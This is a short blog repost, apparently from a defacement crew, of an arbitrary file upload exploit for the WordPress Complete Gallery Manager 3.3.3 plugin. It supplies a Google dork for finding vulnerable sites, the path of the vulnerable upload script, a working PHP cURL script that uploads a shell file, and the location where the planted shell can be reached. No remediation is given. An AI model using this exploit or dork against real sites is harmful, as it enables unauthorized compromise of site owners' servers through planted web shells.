Wordpress Plugins Complete Gallery Manager Sidoarjo Getar

Wordpress Plugins Complete Gallery Manager

Pria Polos

Tuesday, 10 March 2015

Assalamuallaikum Wr.Wb

Author : ?
Full title : WordPress Complete Gallery Manager 3.3.3 File Upload Vulnerability
Date add : 19-09-2013
Category : web applications
Platform : php
Risk Security Risk : High

Google dork : "inurl:/wp-content/plugins/complete-gallery-manager/

Vunlerable : /wp-content/plugins/complete-gallery-manager/frames/upload-images.php

Script php :

<?php
$uploadfile="ikeh.php";
$ch = curl_init("http:site/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Location Shell :

http://site/wp-content/uploads/2013/09/NameYourShell.php

Credits :

Faizal Affandy | Extreme Crew |

Title : Wordpress Plugins Complete Gallery Manager
Description : Assalamuallaikum Wr.Wb Author : ? Full title : WordPress Complete Gallery Manager 3.3.3 File Upload Vulnerability Date add : 19-0...
Rating : 5